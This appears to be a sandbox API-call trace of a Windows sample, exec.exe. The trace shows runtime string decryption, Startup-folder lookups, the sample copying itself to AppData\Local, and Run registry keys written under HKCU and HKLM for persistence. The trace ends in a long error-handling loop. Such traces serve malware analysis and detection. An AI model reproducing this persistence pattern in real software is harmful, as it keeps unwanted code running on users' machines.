[0044.939] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x94 [0044.939] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0x0) returned 0x102 [0044.939] CloseHandle (hObject=0x94) returned 1 [0044.939] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0044.939] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14b8 | out: hHeap=0x8c0000) returned 1 [0044.939] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x60) returned 0x8c1470 [0044.939] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afbb0 | out: phKey=0x1afbb0*=0x2e86f0) returned 1 [0044.939] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x1afb98, dwFlags=0x0) returned 1 [0044.939] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0x1afb64 | out: pbData=0x8c1470, pdwDataLen=0x1afb64) returned 1 [0044.940] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.940] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c14d8 [0044.940] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afb20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb88 | out: phKey=0x1afb88*=0x2e86f0) returned 1 [0044.940] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x1afb70, dwFlags=0x0) returned 1 [0044.940] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14d8, pdwDataLen=0x1afb3c | out: pbData=0x8c14d8, pdwDataLen=0x1afb3c) returned 1 [0044.940] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.940] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1500 [0044.940] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c1528 [0044.940] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c1550 [0044.940] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afaf8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb60 | out: phKey=0x1afb60*=0x2e86f0) returned 1 [0044.940] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x1afb48, dwFlags=0x0) returned 1 [0044.940] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1550, pdwDataLen=0x1afb14 | out: pbData=0x8c1550, pdwDataLen=0x1afb14) returned 1 [0044.940] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.940] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1550 | out: hHeap=0x8c0000) returned 1 [0044.940] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x8c1500, nSize=0xf | out: lpDst="") returned 0x2c [0044.940] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1528 | out: hHeap=0x8c0000) returned 1 [0044.940] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c1500, Size=0x3a) returned 0x8c1500 [0044.940] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x3a) returned 0x8c1548 [0044.940] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c1590 [0044.940] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afaf4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb5c | out: phKey=0x1afb5c*=0x2e86f0) returned 1 [0044.940] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x1afb44, dwFlags=0x0) returned 1 [0044.940] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1590, pdwDataLen=0x1afb10 | out: pbData=0x8c1590, pdwDataLen=0x1afb10) returned 1 [0044.940] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.940] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1590 | out: hHeap=0x8c0000) returned 1 [0044.940] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x8c1500, nSize=0x1d | out: lpDst="") returned 0x2c [0044.940] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1548 | out: hHeap=0x8c0000) returned 1 [0044.940] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c1500, Size=0x72) returned 0x8c1500 [0044.940] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x72) returned 0x8c1580 [0044.940] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c1600 [0044.940] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afaf4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb5c | out: phKey=0x1afb5c*=0x2e86f0) returned 1 [0044.940] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x1afb44, dwFlags=0x0) returned 1 [0044.940] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1600, pdwDataLen=0x1afb10 | out: pbData=0x8c1600, pdwDataLen=0x1afb10) returned 1 [0044.940] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.941] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1600 | out: hHeap=0x8c0000) returned 1 [0044.941] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x8c1500, nSize=0x39 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x2c [0044.941] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1580 | out: hHeap=0x8c0000) returned 1 [0044.941] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0044.941] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c1580 [0044.941] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afb1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb84 | out: phKey=0x1afb84*=0x2e86f0) returned 1 [0044.941] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x1afb6c, dwFlags=0x0) returned 1 [0044.941] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1580, pdwDataLen=0x1afb38 | out: pbData=0x8c1580, pdwDataLen=0x1afb38) returned 1 [0044.941] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.941] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x3e) returned 0x8c15c8 [0044.941] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x3e) returned 0x8c1610 [0044.941] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c1658 [0044.941] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afaf4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb5c | out: phKey=0x1afb5c*=0x2e86f0) returned 1 [0044.941] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x1afb44, dwFlags=0x0) returned 1 [0044.941] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1658, pdwDataLen=0x1afb10 | out: pbData=0x8c1658, pdwDataLen=0x1afb10) returned 1 [0044.941] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.941] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x10) returned 0x8c14d8 [0044.941] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x1afad8 | out: phkResult=0x1afad8*=0xb8) returned 0x0 [0044.941] RegQueryValueExW (in: hKey=0xb8, lpValueName="Startup", lpReserved=0x0, lpType=0x1afad4, lpData=0x8c1610, lpcbData=0x1afadc*=0x3e | out: lpType=0x1afad4*=0x2, lpData=0x8c1610*=0x80, lpcbData=0x1afadc*=0x98) returned 0xea [0044.941] RegCloseKey (hKey=0xb8) returned 0x0 [0044.941] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0044.941] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1658 | out: hHeap=0x8c0000) returned 1 [0044.941] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1610 | out: hHeap=0x8c0000) returned 1 [0044.942] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c15c8, Size=0x7a) returned 0x8c15c8 [0044.942] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x7a) returned 0x8c1650 [0044.942] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c5480 [0044.942] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afaf0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb58 | out: phKey=0x1afb58*=0x2e86f0) returned 1 [0044.942] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x1afb40, dwFlags=0x0) returned 1 [0044.942] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5480, pdwDataLen=0x1afb0c | out: pbData=0x8c5480, pdwDataLen=0x1afb0c) returned 1 [0044.942] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.942] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x10) returned 0x8c14d8 [0044.942] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x1afad4 | out: phkResult=0x1afad4*=0xb8) returned 0x0 [0044.942] RegQueryValueExW (in: hKey=0xb8, lpValueName="Startup", lpReserved=0x0, lpType=0x1afad0, lpData=0x8c1650, lpcbData=0x1afad8*=0x7a | out: lpType=0x1afad0*=0x2, lpData=0x8c1650*=0x80, lpcbData=0x1afad8*=0x98) returned 0xea [0044.942] RegCloseKey (hKey=0xb8) returned 0x0 [0044.942] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0044.942] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5480 | out: hHeap=0x8c0000) returned 1 [0044.942] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1650 | out: hHeap=0x8c0000) returned 1 [0044.942] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c15c8, Size=0xf2) returned 0x8c15c8 [0044.942] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0xf2) returned 0x8c5480 [0044.942] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c16c8 [0044.942] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afaf0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb58 | out: phKey=0x1afb58*=0x2e86f0) returned 1 [0044.942] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x1afb40, dwFlags=0x0) returned 1 [0044.942] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c16c8, pdwDataLen=0x1afb0c | out: pbData=0x8c16c8, pdwDataLen=0x1afb0c) returned 1 [0044.942] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.942] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x10) returned 0x8c14d8 [0044.942] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x1afad4 | out: phkResult=0x1afad4*=0xb8) returned 0x0 [0044.942] RegQueryValueExW (in: hKey=0xb8, lpValueName="Startup", lpReserved=0x0, lpType=0x1afad0, lpData=0x8c5480, lpcbData=0x1afad8*=0xf2 | out: lpType=0x1afad0*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x1afad8*=0x98) returned 0x0 [0044.942] RegCloseKey (hKey=0xb8) returned 0x0 [0044.943] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0044.943] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c14d8 [0044.943] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x1afad4 | out: phkResult=0x1afad4*=0xb8) returned 0x0 [0044.943] RegQueryValueExW (in: hKey=0xb8, lpValueName="Common Startup", lpReserved=0x0, lpType=0x1afad0, lpData=0x8c5518, lpcbData=0x1afad8*=0x5a | out: lpType=0x1afad0*=0x0, lpData=0x8c5518*=0xc4, lpcbData=0x1afad8*=0x5a) returned 0x2 [0044.943] RegCloseKey (hKey=0xb8) returned 0x0 [0044.943] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x1afae8 | out: phkResult=0x1afae8*=0xb8) returned 0x0 [0044.943] RegQueryValueExW (in: hKey=0xb8, lpValueName="Common Startup", lpReserved=0x0, lpType=0x1afae4, lpData=0x8c5518, lpcbData=0x1afaec*=0x5a | out: lpType=0x1afae4*=0x2, lpData=0x8c5518*=0xc4, lpcbData=0x1afaec*=0x78) returned 0xea [0044.943] RegCloseKey (hKey=0xb8) returned 0x0 [0044.943] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0044.943] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c16c8 | out: hHeap=0x8c0000) returned 1 [0044.943] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5480 | out: hHeap=0x8c0000) returned 1 [0044.943] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c15c8, Size=0x1e2) returned 0x8c5480 [0044.943] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e2) returned 0x8c5670 [0044.943] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c15c8 [0044.943] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afaf0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb58 | out: phKey=0x1afb58*=0x2e86f0) returned 1 [0044.943] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x1afb40, dwFlags=0x0) returned 1 [0044.943] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c15c8, pdwDataLen=0x1afb0c | out: pbData=0x8c15c8, pdwDataLen=0x1afb0c) returned 1 [0044.943] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.943] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x10) returned 0x8c14d8 [0044.943] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x1afad4 | out: phkResult=0x1afad4*=0xb8) returned 0x0 [0044.943] RegQueryValueExW (in: hKey=0xb8, lpValueName="Startup", lpReserved=0x0, lpType=0x1afad0, lpData=0x8c5670, lpcbData=0x1afad8*=0x1e2 | out: lpType=0x1afad0*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x1afad8*=0x98) returned 0x0 [0044.944] RegCloseKey (hKey=0xb8) returned 0x0 [0044.944] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0044.944] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c14d8 [0044.944] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x1afad4 | out: phkResult=0x1afad4*=0xb8) returned 0x0 [0044.944] RegQueryValueExW (in: hKey=0xb8, lpValueName="Common Startup", lpReserved=0x0, lpType=0x1afad0, lpData=0x8c5708, lpcbData=0x1afad8*=0x14a | out: lpType=0x1afad0*=0x0, lpData=0x8c5708*=0x0, lpcbData=0x1afad8*=0x14a) returned 0x2 [0044.944] RegCloseKey (hKey=0xb8) returned 0x0 [0044.944] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x1afae8 | out: phkResult=0x1afae8*=0xb8) returned 0x0 [0044.944] RegQueryValueExW (in: hKey=0xb8, lpValueName="Common Startup", lpReserved=0x0, lpType=0x1afae4, lpData=0x8c5708, lpcbData=0x1afaec*=0x14a | out: lpType=0x1afae4*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x1afaec*=0x78) returned 0x0 [0044.944] RegCloseKey (hKey=0xb8) returned 0x0 [0044.944] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0044.944] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c15c8 | out: hHeap=0x8c0000) returned 1 [0044.944] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpDst=0x8c5480, nSize=0xf1 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x99 [0044.944] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5670 | out: hHeap=0x8c0000) returned 1 [0044.944] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1580 | out: hHeap=0x8c0000) returned 1 [0044.944] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20a) returned 0x8c5670 [0044.944] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20a) returned 0x8c5888 [0044.944] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20a) returned 0x8c5aa0 [0044.944] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20a) returned 0x8c5cb8 [0044.944] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8c5670, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe")) returned 0x2e [0044.944] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20a) returned 0x8c5ed0 [0044.944] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8c5ed0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe")) returned 0x2e [0044.945] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5ed0 | out: hHeap=0x8c0000) returned 1 [0044.945] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20a) returned 0x8c5ed0 [0044.945] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8c5ed0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe")) returned 0x2e [0044.945] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5ed0 | out: hHeap=0x8c0000) returned 1 [0044.945] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\exec.exe"), bFailIfExists=0) returned 1 [0044.955] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x1afbec | out: phkResult=0x1afbec*=0xbc) returned 0x0 [0044.955] RegSetValueExW (in: hKey=0xbc, lpValueName="exec", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe", cbData=0x68 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe") returned 0x0 [0044.956] RegCloseKey (hKey=0xbc) returned 0x0 [0044.956] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x1afbd8 | out: phkResult=0x1afbd8*=0xbc) returned 0x0 [0044.956] RegSetValueExW (in: hKey=0xbc, lpValueName="exec", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe", cbData=0x68 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe") returned 0x0 [0044.956] RegCloseKey (hKey=0xbc) returned 0x0 [0044.956] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x134) returned 0x8c1580 [0044.956] GetLastError () returned 0x0 [0044.956] SetLastError (dwErrCode=0x0) [0044.957] GetLastError () returned 0x0 [0044.957] SetLastError (dwErrCode=0x0) [0044.957] GetLastError () returned 0x0 [0044.957] SetLastError (dwErrCode=0x0) [0044.957] GetLastError () returned 0x0 [0044.957] SetLastError (dwErrCode=0x0) [0044.957] GetLastError () returned 0x0 [0044.957] SetLastError (dwErrCode=0x0) [0044.957] GetLastError () returned 0x0 [0044.957] SetLastError (dwErrCode=0x0) [0044.957] GetLastError () returned 0x0 [0044.957] SetLastError (dwErrCode=0x0) [0044.957] GetLastError () returned 0x0 [0044.957] SetLastError (dwErrCode=0x0) [0044.957] GetLastError () returned 0x0 [0044.957] SetLastError (dwErrCode=0x0) [0044.957] GetLastError () returned 0x0 [0044.957] SetLastError (dwErrCode=0x0) [0044.957] GetLastError () returned 0x0 [0044.957] SetLastError (dwErrCode=0x0) [0044.957] GetLastError () returned 0x0 [0044.957] SetLastError (dwErrCode=0x0) [0044.958] GetLastError () returned 0x0 [0044.958] SetLastError (dwErrCode=0x0) [0044.958] GetLastError () returned 0x0 [0044.958] SetLastError (dwErrCode=0x0) [0044.958] GetLastError () returned 0x0 [0044.958] SetLastError (dwErrCode=0x0) [0044.958] GetLastError () returned 0x0 [0044.958] SetLastError (dwErrCode=0x0) [0044.958] GetLastError () returned 0x0 [0044.958] SetLastError (dwErrCode=0x0) [0044.958] GetLastError () returned 0x0 [0044.958] SetLastError (dwErrCode=0x0) [0044.958] GetLastError () returned 0x0 [0044.958] SetLastError (dwErrCode=0x0) [0044.958] GetLastError () returned 0x0 [0044.958] SetLastError (dwErrCode=0x0) [0044.958] GetLastError () returned 0x0 [0044.958] SetLastError (dwErrCode=0x0) [0044.958] GetLastError () returned 0x0 [0044.958] SetLastError (dwErrCode=0x0) [0044.958] GetLastError () returned 0x0 [0044.958] SetLastError (dwErrCode=0x0) [0044.959] GetLastError () returned 0x0 [0044.959] SetLastError (dwErrCode=0x0) [0044.959] GetLastError () returned 0x0 [0044.959] SetLastError (dwErrCode=0x0) [0044.959] GetLastError () returned 0x0 [0044.959] SetLastError (dwErrCode=0x0) [0044.959] GetLastError () returned 0x0 [0044.959] SetLastError (dwErrCode=0x0) [0044.959] GetLastError () returned 0x0 [0044.959] SetLastError (dwErrCode=0x0) [0044.959] GetLastError () returned 0x0 [0044.959] SetLastError (dwErrCode=0x0) [0044.959] GetLastError () returned 0x0 [0044.959] SetLastError (dwErrCode=0x0) [0044.959] GetLastError () returned 0x0 [0044.959] SetLastError (dwErrCode=0x0) [0044.959] GetLastError () returned 0x0 [0044.959] SetLastError (dwErrCode=0x0) [0044.959] GetLastError () returned 0x0 [0044.959] SetLastError (dwErrCode=0x0) [0044.959] GetLastError () returned 0x0 [0044.959] SetLastError (dwErrCode=0x0) [0044.960] GetLastError () returned 0x0 [0044.960] SetLastError (dwErrCode=0x0) [0044.960] GetLastError () returned 0x0 [0044.960] SetLastError (dwErrCode=0x0) [0044.960] GetLastError () returned 0x0 [0044.960] SetLastError (dwErrCode=0x0) [0044.960] GetLastError () returned 0x0 [0044.960] SetLastError (dwErrCode=0x0) [0044.960] GetLastError () returned 0x0 [0044.960] SetLastError (dwErrCode=0x0) [0044.960] GetLastError () returned 0x0 [0044.960] SetLastError (dwErrCode=0x0) [0044.960] GetLastError () returned 0x0 [0044.960] SetLastError (dwErrCode=0x0) [0044.960] GetLastError () returned 0x0 [0044.960] SetLastError (dwErrCode=0x0) [0044.960] GetLastError () returned 0x0 [0044.960] SetLastError (dwErrCode=0x0) [0044.960] GetLastError () returned 0x0 [0044.960] SetLastError (dwErrCode=0x0) [0044.960] GetLastError () returned 0x0 [0044.960] SetLastError (dwErrCode=0x0) [0044.961] GetLastError () returned 0x0 [0044.961] SetLastError (dwErrCode=0x0) [0044.961] GetLastError () returned 0x0 [0044.961] SetLastError (dwErrCode=0x0) [0044.961] GetLastError () returned 0x0 [0044.961] SetLastError (dwErrCode=0x0) [0044.961] GetLastError () returned 0x0 [0044.961] SetLastError (dwErrCode=0x0) [0044.961] GetLastError () returned 0x0 [0044.961] SetLastError (dwErrCode=0x0) [0044.961] GetLastError () returned 0x0 [0044.961] SetLastError (dwErrCode=0x0) [0044.961] GetLastError () returned 0x0 [0044.961] SetLastError (dwErrCode=0x0) [0044.961] GetLastError () returned 0x0 [0044.961] SetLastError (dwErrCode=0x0) [0044.961] GetLastError () returned 0x0 [0044.961] SetLastError (dwErrCode=0x0) [0044.961] GetLastError () returned 0x0 [0044.961] SetLastError (dwErrCode=0x0) [0044.961] GetLastError () returned 0x0 [0044.961] SetLastError (dwErrCode=0x0) [0044.961] GetLastError () returned 0x0 [0044.962] SetLastError (dwErrCode=0x0) [0044.962] GetLastError () returned 0x0 [0044.962] SetLastError (dwErrCode=0x0) [0044.962] GetLastError () returned 0x0 [0044.962] SetLastError (dwErrCode=0x0) [0044.962] GetLastError () returned 0x0 [0044.962] SetLastError (dwErrCode=0x0) [0044.962] GetLastError () returned 0x0 [0044.962] SetLastError (dwErrCode=0x0) [0044.962] GetLastError () returned 0x0 [0044.962] SetLastError (dwErrCode=0x0) [0044.962] GetLastError () returned 0x0 [0044.962] SetLastError (dwErrCode=0x0) [0044.962] GetLastError () returned 0x0 [0044.962] SetLastError (dwErrCode=0x0) [0044.962] GetLastError () returned 0x0 [0044.962] SetLastError (dwErrCode=0x0) [0044.962] GetLastError () returned 0x0 [0044.962] SetLastError (dwErrCode=0x0) [0044.962] GetLastError () returned 0x0 [0044.962] SetLastError (dwErrCode=0x0) [0044.962] GetLastError () returned 0x0 [0044.963] SetLastError (dwErrCode=0x0) [0044.963] GetLastError () returned 0x0 [0044.963] SetLastError (dwErrCode=0x0) [0044.963] GetLastError () returned 0x0 [0044.963] SetLastError (dwErrCode=0x0) [0044.963] GetLastError () returned 0x0 [0044.963] SetLastError (dwErrCode=0x0) [0044.963] GetLastError () returned 0x0 [0044.963] SetLastError (dwErrCode=0x0) [0044.963] GetLastError () returned 0x0 [0044.963] SetLastError (dwErrCode=0x0) [0044.963] GetLastError () returned 0x0 [0044.963] SetLastError (dwErrCode=0x0) [0044.963] GetLastError () returned 0x0 [0044.963] SetLastError (dwErrCode=0x0) [0044.963] GetLastError () returned 0x0 [0044.963] SetLastError (dwErrCode=0x0) [0044.963] GetLastError () returned 0x0 [0044.963] SetLastError (dwErrCode=0x0) [0044.963] GetLastError () returned 0x0 [0044.963] SetLastError (dwErrCode=0x0) 